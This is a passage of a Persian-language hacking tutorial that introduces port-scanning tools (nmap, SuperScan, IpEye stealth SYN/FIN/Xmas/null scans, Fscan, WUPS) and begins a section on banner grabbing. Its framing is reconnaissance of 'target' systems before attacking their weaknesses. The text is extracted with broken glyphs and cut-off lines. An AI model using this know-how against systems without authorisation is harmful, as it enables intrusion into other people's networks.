‫ﺻﻔﺤﻪ‬

‫‪٣٥‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٦‬‬

‫اﻟﮕﻮی ﻋﻤﻮﻣﯽ دﺱﺘﻮرات و ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت زیﺮ ﻣﻴﺒﺎﺷﺪ‪:‬‬ ‫>‪nmap [Scan Type(s)] [Options]
‫ﺧﻮب ﺡﺎﻻ دیﺪیﺪ ﭼﺮا ﮔﻔﺘﻢ ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ یﮏ اﺱﺖ ﺏﺎ ایﻦ هﻤﻪ ﻣﮑﺎﻧﻴﺰم ﺧﻮب ﻣﻌﻠﻮﻣﻪ ﻧﻔﺲ ﮐﺶ ﻣﯽ ﻃﻠﺒﻪ !!!‬ ‫ﻼ ﺕﻮﺽﻴﺢ دادم ﺏﺮای ﺷﻤﺎ هﺎ وﻟﯽ ﻓﮑﺮ ﮐﻨﻢ هﻴﭻ ﮐﺴﯽ ﻗﺒﻞ از ﻣﻦ ایﻦ ﺟﻮری ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏ ﺎز‬ ‫ﻣﻦ ﺕﻤﺎم ﻣﮑﺎﻧﻴﺰم هﺎ و ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ را ﮐﺎﻣ ً‬ ‫ﻧﮑﺮدﻩ ﺏﺎﺷﺪ!! وﻟﯽ ﻓﮑﺮ ﻣﻴﮑﻨﻢ ﺕﮏ ﺕﮏ ﺱﻮیﭻ هﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﮐﺎر ﺷﻤﺎ هﺎ ﺏﻴﺎیﺪ ‪.‬‬ ‫ﺏﻘﻴﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن ﻣﻴﺮیﻢ ﺱﺮ اﺏﺰار ﺏﻌﺪی ﺏﻪ ﻧﺎم‪:‬‬ ‫ایﻦ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ Nmap‬یﮏ ﻧﺴﺨﻪ ﺏﺎ ﻧﺎم ‪ nmap-3.75-win32‬دارد ﮐﻪ هﻴﭻ ﻣﺸﮑﻠﯽ ﻧﺪارد و روی ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز ‪ NT‬از ﺟﻤﻠﻪ ‪XP‬‬ ‫و ‪ ...‬ﺏﻪ ﺏﻬﺘﺮیﻦ ﺷﻴﻮﻩ ﻣﻤﮑﻦ ﮐﺎر ﻣﻴﮑﻨﺪ اﻟﺒﺘﻪ در ﺧﻂ ﻓﺮﻣﺎن ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ایﻦ ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﺎ ﺏﺎ ﻣﻘﺎیﺴﻪ ﺟﻮاﺏﻬﺎ ﺏﻪ ﺡﺮف ﻣﻦ ﭘﯽ ﺏﺒﺮیﺪ‪.‬‬ ‫‪ Net Scan Tools -٢‬ﮐﻪ ﺏﺎﻻ در ﺏﺎرﻩ ﮐﺎرهﺎش ﺕﻮﺽﻴﺢ دادم ایﻦ ﺟﺎ هﻢ یﮏ ﻣﺨﺘﺼﺮی ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪:‬‬

‫ﮐﻪ هﻤﺎﻧﻄﻮر ﮐﻪ در ﺷﮑﻞ ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ دارای اﻣﮑﺎن ‪ NetScanner‬اﺱﺖ ﮐﻪ دﻗﻴﻘﺎ ﻣﺸﺎﺏﻪ ﺱ ﻮیﭻ ‪ –sP‬در ﻧ ﺮم اﻓ ﺰار ‪ Nmap‬اﺱ ﺖ‪.‬‬ ‫ﺏﺎ ایﻦ اﻣﮑﺎن ﻣﻴﺘﻮان ﻣﺤﺪودﻩ ای ﻣﺸﺨﺺ ) رﻧﺞ ( از ‪ IP‬هﺎ را ﺏﺮای ایﻨﮑﻪ ﺁیﺎ ﻓﻌﺎل هﺴﺘﻨﺪ یﺎ ﻧﻪ ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار داد‪.‬‬ ‫اﻣﮑﺎن دیﮕﺮ ایﻦ ﺏﺮﻧﺎﻣﻪ ‪ Port Scanner‬اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﺏﺪ ﻧﻴﺴﺖ ﮐﻪ ﺷﻤﺎ ﺏﺎ وارد ﮐﺮدن ‪ IP‬یﺎ ﻣﺤﺪودﻩ ﺁن ﺏﻪ ﭘﻮیﺶ ﭘﻮرت ﻣﯽ ﭘﺮدازیﺪ‪ .‬دیﮕ ﻪ هﻤ ﻴﻦ‬ ‫ﭼﻮن ﺧﻴﻠﯽ ﮐﺎر ﺏﺎ ﺁن ﺕﺎﺏﻠﻮ ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ ‪.‬‬ ‫‪ -٣‬اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﻟﺒﺘﻪ ﺧﻮدم هﻢ از ﺁن ﻣﺜﻞ اﺏﺰارهﺎی ﻗﺒﻠﯽ هﻢ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ ‪ Super Scan‬اﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٧‬‬

‫ایﻦ اﺏﺰار ﺏﺪی ﻧﻴﺴﺖ یﻌﻨﯽ اﺻﻼ ﻧﻤﻴﺸﻮد ﺏﻪ ﺁن ﮔﻔﺖ ﺏﺪ وﻟﯽ یﮏ زرﻩ ای ﺷﻠﻮغ و اﻟﺒﺘﻪ ﺏﯽ روال دﻗﻴﻘﺎ ﻣﺜﻞ ایﻦ ﻣﻘﺎﻟﻪ!! اﻟﺒﺘ ﻪ دارای اﻣﮑﺎﻧ ﺎت ﺧ ﻮﺏﯽ‬ ‫هﻢ اﺱﺖ‪ .‬ایﻦ ﺏﺮﻧﺎﻣﻪ از ﻣﮑﺎﻧﻴﺰم دﺱﺖ ﺕﮑﺎﻧﯽ ‪ ٣‬ﺱﻪ ﻣﺮﺡﻠﻪ ای اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ .‬دارای یﮏ ﺱﺮی ﺏﺨﺶ اﺱﺖ ﮐﻪ ﺱﻌﯽ ﻣﻴﮑﻨﻢ هﻤﻪ را ﺕﻮﺽﻴﺢ ﺏﺪهﻢ‪:‬‬ ‫‪ : Host name Lookup -١‬ﺧﻮب ﺕﺎﺏﻠﻮ ایﻨﺠﺎ ﺏﺎیﺪ اﺱﻢ یﺎ ‪ IP‬هﺪف ﺧﻮدﺕﺎن را وارد ﮐﻨﻴﺪ ﺕﺎ یﮏ ﺱﺮی اﻃﻼﻋﺎت درﺏﺎرﻩ ﺁن ﺏﺪﺱﺖ ﺁوریﺪ‪.‬‬ ‫‪ -٢‬ﻗﺴﻤﺖ ‪ : Configuration‬ﺧﻮب ﭘﻴﮑﺮ ﺏﻨﺪی را در ایﻨﺠﺎ ﺕﻨﻈﻴﻢ ﻣﻴﮑﻨﻴﻢ از ﺟﻤﻠﻪ ﻟﻴﺴﺖ ﭘﻮرت هﺎی را ﮐ ﻪ ﻣﻴﺨ ﻮاهﻴﻢ ﭘ ﻮیﺶ ﺏﮑﻨ ﻴﻢ ﮐ ﻪ ﺏ ﺮای ای ﻦ‬ ‫ﮐﺎر هﻢ ﻣﻴﺘﻮاﻧﻴﺪ ﺧﻮدﺕﺎن ﻟﻴ ﺴﺖ درﺱ ﺖ ﮐﻨﻴ ﺪ ه ﻢ ﻣﻴﺘﻮاﻧﻴ ﺪ از ﻟﻴ ﺴﺖ ه ﺎی ه ﻢ راﻩ ﺏﺮﻧﺎﻣ ﻪ اﺱ ﺘﻔﺎدﻩ ﮐﻨﻴ ﺪ ﺷ ﻤﺎ ه ﻢ ﻣﻴﺘﻮاﻧﻴ ﺪ ﻗ ﺴﻤﺖ ‪Helper apps in‬‬ ‫‪ right-click menu‬را ﺏﺎ ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﻮرد ﻧﻈﺮ ﺧﻮد ﭘﺮ ﮐﻨﻴﺪ ﻣﺜﻼ ﺏﺮای ﮔﺰیﻨﻪ ‪ Telnet‬ﻣﻴﺘﻮاﻧﻴﺪ از ﺏﺮﻧﺎﻣﻪ ای ﺏ ﻪ هﻤ ﻴﻦ ﻧ ﺎم در ویﻨ ﺪوز اﺱ ﺘﻔﺎدﻩ‬ ‫ﮐﻨﻴﺪ یﺎ ﻧﺮﻣﺎﻓﺰارهﺎی دیﮕﺮی هﻤﭽﻮن ‪ NC‬و‪ ...‬ﮐﻪ وﻗﺘﯽ یﮏ ﭘﻮرت ﺏﺎز ﭘﻴﺪا ﮐﺮد ﺏﺮﻧﺎﻣﻪ ﺏﺎ یﮏ راﺱﺖ ﮐﻠﻴ ﮏ روی ﺁن ﺏﺘﻮاﻧﻴ ﺪ ﺏ ﺎ ﻧ ﺮم اﻓﺰاره ﺎی‬ ‫ﮐﻪ در ایﻦ ﺏﺨﺶ ﻣﺸﺨﺺ ﮐﺮدﻩ ایﺪ ﺏﻪ ان ﭘﻮرت وﺻﻞ ﺷﻮیﺪ و‪..‬‬ ‫‪ -٣‬ﻗﺴﻤﺖ ‪ IP‬در ایﻦ ﻗﺴﻤﺖ ﻣﺤﺪودﻩ ای را ﮐﻪ ﺏﺎیﺪ ﭘﻮیﺶ ﺷﻮد را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﻢ ‪.‬‬ ‫‪ -۴‬ﻗﺴﻤﺖ ‪ Scan‬و ‪ Scan Type‬در ﺏﺨ ﺶ ‪ Scan Type‬ﻣﻴﺘ ﻮاﻧﻴﻢ ﭘﺎراﻣﺘﺮه ﺎی ﻣ ﻮرد ﻧﻈ ﺮ ﺧ ﻮد ﺟﻬ ﺖ ﮐﻨﺘ ﺮل ﭘ ﻮیﺶ را ﻣ ﺸﺨﺺ ﮐﻨ ﻴﻢ‪ .‬ﮔﺰیﻨ ﻪ‬ ‫‪ only Scan Responsive Ping‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ ﺏﺮﻧﺎﻣﻪ از ‪ IP‬هﺎی ﮐﻪ در ﺟﻮاب ‪ Ping‬ﭘﺎﺱﺨﯽ از ﺧﻮد ﻧﺪادﻩ اﻧﺪ ) ﻓﻌﺎل ﻧﺒ ﻮدﻩ اﻧ ﺪ ( از ﭘ ﻮیﺶ‬ ‫ﭘﻮرت هﺎی ﺁﻧﻬﺎ ﺧﻮد داری ﮐﻨﺪ‪.‬‬ ‫ﮔﺰیﻨﻪ ‪ Host Responsive Show‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ ﭘﺲ از ﺏﺮﻗﺮاری اﺕ ﺼﺎل ﺏ ﺎ ﻣﻴﺰﺏ ﺎن و ﺕﺤﺮی ﮏ ﭘ ﻮرت ﻣ ﻮرد ﻧﻈ ﺮ ) ﺏ ﻪ ﻣﻨﻈ ﻮر ﺟﻤ ﻊ‬ ‫ﺁوری اﻃﻼﻋﺎت ﻻزم در ﺏﺎرﻩ ﺁن ( هﺮﮔﻮﻧﻪ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁوردﻩ از ﺁن را ﻧﻤﺎیﺶ ﺏﺪهﺪ‪.‬‬ ‫ﻗﺴﻤﺖ ﺁﺧﺮ ﮔﺰیﻨﻪ ‪ All Port From‬هﻢ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ وارد ﮐﺮد اوﻟﻴﻦ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﻮرد ﻧﻈﺮ و ﺁﺧﺮیﻦ ﺁن ﻣﺤﺪودﻩ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﭘﻮیﺶ ﮐﻨﻴﺪ‪.‬‬ ‫‪-۴‬ﻧﺮم اﻓﺰار ‪: IpEye‬‬ ‫ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﮐﻪ ﻣﻴﺨ ﻮاهﻢ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ ﮐ ﻪ ﺕ ﺎ ﺡ ﺪودی از دو ﺏﺮﻧﺎﻣ ﻪ ﺏ ﺎﻻ )‪ Net Scan Tools‬و ‪ ( Super Scan‬ﻗ ﻮی ﺕ ﺮ ﺏ ﻮدﻩ و ﻣﮑ ﺎﻧﻴﺰم ه ﺎی‬ ‫ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ را هﻢ ﺕﺎ ﺡﺪودی ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ ﻋﺒﺎرت اﺱﺖ از ‪ IpEye‬ﮐﻪ ﻣﺜﻞ ﺏﻘﻴﻪ اﺏﺰار هﺎی ﺧﻮب ﺕﺤﺖ ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﻣﻴﺸﻮد ‪.‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﮑﺎﻧﻴﺰم هﺎی ‪ SYS‬و ‪ FIN‬و ‪ Xmas tree‬و ‪ null‬را در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻣﻴﺪهﺪ و از ایﻨﺠﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺁن را ﺕﻬﻴﻪ ﮐﻨﻴﺪ‪.‬‬ ‫ﺏﻌﺪ از اﺟﺮای ﺏﺮﻧﺎﻣﻪ ﺷﻤﺎ یﮏ هﻤﭽﻴﻦ ﭼﻴﺰی ﻣﻴﺒﻴﻨﻴﺪ ﮐﻪ ﻣﻦ ﺟﺎهﺎی ﻣﻬﻢ ﺁن را ﺕﻮ ﭘﺮ ﮐﺮدﻩ ام ‪:‬‬ ‫)‪ipEye 1.2 - (c) 2000-2001, Arne Vidstrom ([email protected]‬‬ ‫‪- http://ntsecurity.nu/toolbox/ipeye/‬‬ ‫‪Error: Too few parameters.‬‬ ‫‪Usage:‬‬ ‫]‪ipEye <scantype> -p <port> [optional parameters‬‬ ‫>‪ipEye <scantype> -p is one of the following:‬‬ ‫)‬

‫)‬

‫ﭘﻮﻳﺶ ﳐﻔﻴﺎﻧﻪ دﺳﺖ ﺗﮑﺎﻧﯽ دو ﻣﺮﺡﻠﻪ ای ( ‪= SYN scan‬‬

‫‪-syn‬‬

‫) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد ( ‪= FIN scan‬‬

‫‪-fin‬‬

‫ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد( ‪-null = Null scan‬‬

‫) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺗﮑﻞ‬

‫ﺑﻪ درد وﻳﻨﺪوز ﳕﯽ ﺧﻮرد ( >‪-xmas = Xmas scan>br‬‬

‫‪(note: FIN, Null and Xmas scans don't work against Windows systems.‬‬

‫‪[optional parameters] are selected from the following:‬‬ ‫‪= source IP for the scan‬‬

‫>‪-sip <source IP‬‬

‫‪-sp <source port> = source port for the scan‬‬ ‫‪= delay between scanned ports in milliseconds‬‬

‫>‪-d <delay in ms‬‬

‫)‪(default set to 750 ms‬‬

‫ﺧﻮب ﺡﻘﻴﻘﺘًﺎ ﺏﻪ ﺧﺪا زور دارد یﮏ ﻣﻄﻠﺐ ‪ ۴٠‬ﺏﺎر ﺕﮑﺮار ﮐﻨﻴﺪ ﺕﻮ یﮏ ﻣﻘﺎﻟﻪ ) ﺧﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻴﻠﯽ ﺱﺨﺖ ﺕﺎیﭗ ﮐﺮدن(‪.‬‬ ‫هﻤﺎﻧﻄﻮر ﮐﻪ در ﺏﺎﻻ ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ ﺷﮑﻞ ﻋﻤﻮﻣﯽ ایﻦ دﺱﺘﻮر در ایﻦ ﺏﺮﻧﺎﻣﻪ ایﻦ ﺷﮑﻠﯽ ‪:‬‬ ‫]‪ipEye <scantype> -p <port> [optional parameters‬‬ ‫>‪ipEye <scantype> -p
‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٨‬‬

‫ﺧﻮب در ﺟﻮاب ایﻦ ﺏﺮﻧﺎﻣﻪ ﺟﻠﻮی هﺮ یﮏ از ﭘﻮرت هﺎ یﮏ واژﻩ ای ﻣﻴﻨﻮیﺴﺪ ﮐﻪ ﻣﻌﺮف ﭼﻴﺰی اﺱﺖ ﮐﻪ ﺁن را هﻢ ﻣﻴﮕﻮیﻢ‪.‬‬ ‫واژﻩ ‪ Closed‬یﻌﻨﯽ ﮐﺎﻣﭙﻴﻮﺕﺮ در ﺁن ﻃﺮف هﺴﺖ وﻟﯽ ﺏﻪ ﭘﻮرت ﮔﻮش ﻧﻤﯽدهﺪ !!‬ ‫واژﻩ ‪ Reject‬یﻌﻨﯽ ایﻨﮑﻪ یﮏ ‪ ) firewall‬دیﻮار ﺁﺕﺶ (هﺴﺖ ﮐﻪ اﺟﺎزﻩ اﺕﺼﺎل ﺏﻪ ﺁن ﭘﻮرت را ﻧﻤﯽدهﺪ یﺎ ﭼﻴﺰی ﻣﺜﻞ ﺁن !!‬ ‫واژﻩ ‪ Drop‬یﻌﻨﯽ ایﻨﮑﻪ یﮏ دیﻮار ﺁﺕﺶ یﺎ ﭼﻴﺰی ﻣﺜﻞ ﺁن هﻤﻪﭼﻴﺰ را ﭘﺲ ﻣﯽزﻧﺪ و یﺎ اﺻﻼ ﮐﺎﻣﭙﻴﻮﺕﺮی اوﻧﻮر ﻧﻴﺴﺖ !!‬ ‫واژﻩ ‪ Open‬هﻢ ﮐﻪ یﻌﻨﯽ ایﻨﮑﻪ ﺁن ﭘﻮرت ﺏﺎز !!‬ ‫‪ -۵‬ﺏﺮﻧﺎﻣﻪ ‪: Fscan‬‬ ‫ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﮐﻪ ﻗﺴﻂ ﻣﻌﺮﻓﯽ ﺁن را دارم ﺏﺮﻧﺎﻣﻪ ‪ FScan‬اﺱﺖ ﮐﻪ ﺏﺮای ﭘ ﻮیﺶ ﭘ ﻮرت ه ﺎی ‪ UDP‬ﮐ ﺎرﺏﺮد دارد‪ .‬ﮐ ﻪ ﮐ ﺎر ﺏ ﺎ ﺁن ﺕﺤ ﺖ ﺧ ﻂ ﻓﺮﻣ ﺎن‬ ‫اﻣﮑﺎن ﭘﺬیﺮ ﺏﻮدﻩ و اﻟﺒﺘﻪ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ و ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر در ﺁن ﺏﻪ ﺻﻮرت زیﺮ ﻣﻴﺒﺎﺷﺪ‪:‬‬ ‫>‪Fscan –u
‫ﺧﻮب ﻓﻘﻂ ایﻦ ﺕﻮﺽﻴﺢ ﺏﺪهﻢ ﮐﻪ یﮏ دﻓﻌﻪ اﺷﺘﺒﺎﻩ ﻧﮑﻨﻴﺪ‪ .‬ﻗﺴﻤﺖ ‪ ١‬ﮐﻪ در ﺷﮑﻞ ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ ﺏﺮای ﻣﺸﺨﺺ ﮐ ﺮدن رﻧ ﺞ ‪ IP‬اﺱ ﺖ و ﻗ ﺴﻤﺖ ‪ ٢‬ه ﻢ‬ ‫ﺏﺮای ﻣﺸﺨﺺ ﮐﺮدن رﻧﺞ ﭘﻮرت هﺎ اﺱﺖ‪ .‬ﮔﺰیﻨﻪ ‪ Interval‬هﻢ وﻗﻔ ﻪ زﻣ ﺎﻧﯽ را ﮐ ﻪ ﺏ ﻴﻦ ه ﺮ ﭘ ﻮیﺶ ‪ IP‬ﺏﺎی ﺪ ﻣﻨﺘﻈ ﺮ ﺏﺎﺷ ﺪ را ﻣ ﺸﺨﺺ ﻣ ﯽ ﮐﻨ ﺪ‪ .‬در‬ ‫ﻗﺴﻤﺖ ‪ Config‬هﻢ ﻣﻴﺘﻮاﻧﻴﺪ دﻧﺒﺎل اﺱﺐ ﺕﺮوا ‪ BO2K‬ﺏﮕﺮدیﺪ و‪..‬‬ ‫ﮐﺎر ﺏﺎ ایﻦ ﺧﻴﻠﯽ ﺱﺎدﻩ ‪.‬‬ ‫ﺁﺧﺮیﻦ اﺏﺰار ﭘﻮیﺶ ﭘﻮرﺕﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار ‪ WUPS‬اﺱﺖ‪.‬ایﻦ اﺏﺰار ﺕﻮﺱ ﻂ دوﺱ ﺖ ﺧ ﻮﺏﻢ ﺁﻗ ﺎی ‪ ) Arne Vidstrom‬هﻤ ﺎن ﺕﻮﺱ ﻌﻪ دهﻨ ﺪﻩ‬ ‫اﺏﺰار ‪ ( IpEye‬ﻃﺮاﺡﯽ و ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺱﺖ‪ .‬ایﻦ اﺏﺰار هﻢ ﮔﺮاﻓﻴﮑﯽ اﺱﺖ !! ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ ﻣ ﺸﮑﻞ ﮐﻮﭼﻮﻟ ﻮ دارد و ﺁن ﻋ ﺪم ﺕﻮاﻧ ﺎیﯽ ﭘ ﻮیﺶ ی ﮏ‬ ‫رﻧﺞ ‪ IP‬اﺱﺖ اﻟﺒﺘﻪ اﺏﺰار ﺏﺎﻻی را ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ اول ﻣﻌﺮﻓﯽ ﮐﺮدم‪.‬ﮐﺎر ﺏﺎ ایﻦ یﮑﯽ واﻗﻌًﺎ ﺱﺎدﻩ اﺱﺖ‪ .‬ﭘﺲ ﻣﻦ ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ دیﮕﻪ ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ‬ ‫در ﺏﺎرﻩ ایﻦ اﺏﺰار‪.‬‬ ‫ﺧﻮب ﺕﺎ ﺏﻪ ایﻦ ﺟﺎ یﮏ ﺱﺮی ﻧﺮم اﻓﺰار در ﺏﺎرﻩ ﭘﻮیﺶ ﭘﻮرت و ﭘﻮیﺶ ‪ IP‬ﺏﻪ ﻣﻨﻈﻮر ایﻨﮑﻪ اﺻﻼ ﺁیﺎ ﻣﺎﺷﻴﻦ ﻓﻌﺎل هﺴﺖ یﺎ ﻧ ﻪ و ی ﺎ اﮔ ﺮ ﻓﻌ ﺎل ه ﺴﺖ‬ ‫ﭼﻪ ﭘﻮرت هﺎیﯽ از ﺁن ﺏﺎز اﺱﺖ و‪ ...‬ﺏﻪ ﺷﻤﺎ ﻣﻌﺮﻓﯽ ﮐﺮدم و ﺁﻣﻮزش ﻧﻴﺰ دادم‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٩‬‬

‫ﺡﺎﻻ هﻨﻮز ﻣﺎ در ﻣﺮﺡﻠﻪ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﭘﺎیﻪ از هﺪف هﺴﺘﻴﻢ ی ﮏ ﮔ ﺎم دیﮕ ﺮ و اﻟﺒﺘ ﻪ ﺁﺧ ﺮیﻦ ﮔ ﺎم از ﻣﺮﺡﻠ ﻪ ﮐﻠ ﯽ ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت ‪ ،‬ﮐ ﻪ‬ ‫اﻟﺒﺘﻪ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ و ﺏﺴﻴﺎر ﺏﺎ ارزش ﮐ ﻪ ﻣﻌﻤ ﻮﻻ ه ﻢ ﻧﺎدی ﺪﻩ ﮔﺮﻓﺘ ﻪ ﻣﻴ ﺸﻮد ﻣﺮﺡﻠ ﻪ " ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت ﺏ ﻪ روش ‪" Grabbing Banner‬‬ ‫اﺱﺖ‪.‬‬ ‫ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﺏﻪ روش ‪Grabbing Banner‬‬ ‫ﻣﻘﺪﻣﻪ ‪:‬‬ ‫در ﮔﺬﺷﺘﻪ ﻧﻪ ﭼﻨﺪان دور ‪ ،‬ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ هﺎی هﺪف ﺏﺎ ﺱﺨﺘﯽ ﺁن ﭼﻪ اﻣﺮوز ﺷﺎﻩ ﺁن هﺴﺘﻴﻢ ‪ ،‬ﻧﺒﻮد‪ .‬ﺕﺎ هﻤﻴﻦ ﭼﻨﺪ ﺻﺒﺎح ﭘﻴﺶ اﺻﻼ‬ ‫) ﺏﻪ ﻏﻴﺮ از ﺱﺎیﺖ هﺎی ﻣﻬﻢ و ﻣﻌﺮوف ( ﻣﺪیﺮان ﺱﺎیﺘﻬﺎ ﺡﺴﺎﺱﻴﺖ ﺧﺎﺻﯽ در ایﻦ ﺏﺎرﻩ ﻧﺪاﺷﺘﻨﺪ و ﺁدم ﺏﺎ یﮏ ‪ Telnet‬ﺱﺎدﻩ یﮏ دو ﺟﻴﻦ اﻃﻼﻋﺎت‬ ‫از ﺟﻤﻠﻪ ﻧﺎم ﻣﻴﺰﺏﺎن ‪ ،‬ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺷﻤﺎرﻩ ﻧﺴﺨﻪ ﺁن و‪ ...‬را ﺏﻪ ﻃﻮر ﺁزاد در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻣﻴﺪادﻧﺪ‪.‬اﺱﺎس ﮐﺎر در ایﻦ روش ﺏﺮﭘﺎیﻪ‬ ‫اﺕﺼﺎل ﺏﻪ ﭘﻮرت ﺏﺎز اﺱﺖ ﭼﻮن اﺻﻮﻻ هﻨﮕﺎﻣﯽ یﮏ ﭘﻮرت ﺏﺎز اﺱﺖ ﮐﻪ یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ) یﮏ ﻧﻮع ﻧﺮم اﻓﺰار ﮐﺎرﺏﺮدی( ﺁن را ﺏﺎز ﮐﺮدﻩ‬ ‫اﺱﺖ ﺕﺎ ﺏﺎ ﺷﺒﮑﻪ ﺕﻌﺎﻣﻞ ﮐﻨﺪ !!! ﺧﻮب اﮔﺮ ﻣﺎ ﺏﻪ ﺁن ﭘﻮرت ﻣﺘﺼﻞ ﺷﻮیﻢ ﺕﺎ ﺏﺒﻴﻨﻴﻢ ﮐﺪام ﺱﺮویﺲ دهﻨﺪﻩ ﺁن را ﺏﺎز ﮐﺮدﻩ اﺱﺖ و ﺷﻤﺎرﻩ ﻧﺴﺨﻪ ﺁن را‬ ‫ﺏﻔﻬﻤﻴﻢ ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻧﻘﻄﻪ ﺽﻌﻒ هﺎی ﺁن ﺱﻴﺴﺘﻢ ﺁن را ﻣﻮرد ﺕﻬﺎﺟﻢ ﻗﺮار ﺏﺪهﻴﻢ‪ .‬اﻟﺒﺘﻪ در ‪ %۵٠‬ﻣﻮارد ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ هﻢ ﻣﻴﺘﻮان ﺷﻨﺎﺱﺎیﯽ‬ ‫ﮐﺮد ﮐﻪ ﺁن هﻢ ﻣﺜﻞ ﺏﺎﻻی ﻣﻴﺸﻮد ﺏﺎهﺎش ﺕﻌﺎﻣﻞ ﮐﺮد ﺁن هﻢ از ﻧﻮع ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮدﻣﻮن‪.‬‬ ‫اﻣﺮوزﻩ ﺏﺮﻧﺎﻣﻪ ‪ telnet‬ﮐﻢ ﺏﻴﺶ ﺏﺎ ﺏﺮﻧﺎﻣﻪ دیﮕﺮی ﮐﻪ ﺕﺨﺼﺼﯽ اﺱﺖ ﺟﺎیﮕﺰیﻦ ﺷﺪﻩ اﺱﺖ از ﺟﻤﻠﻪ ﻣﻴﺘﻮان ﺏﻪ ﻣﻮارد زیﺮ اﺷﺎرﻩ ﮐﺮد ‪:‬‬ ‫در ﻣﻮارد ﺏﺪﺱﺖ ﺁوری اﻃﻼﻋﺎت از ﭘﺮوﺕﮑﻞ ‪ SHH‬ﺏﺎ ﻋﻨﻮان ‪ Secure Shell‬یﺎ 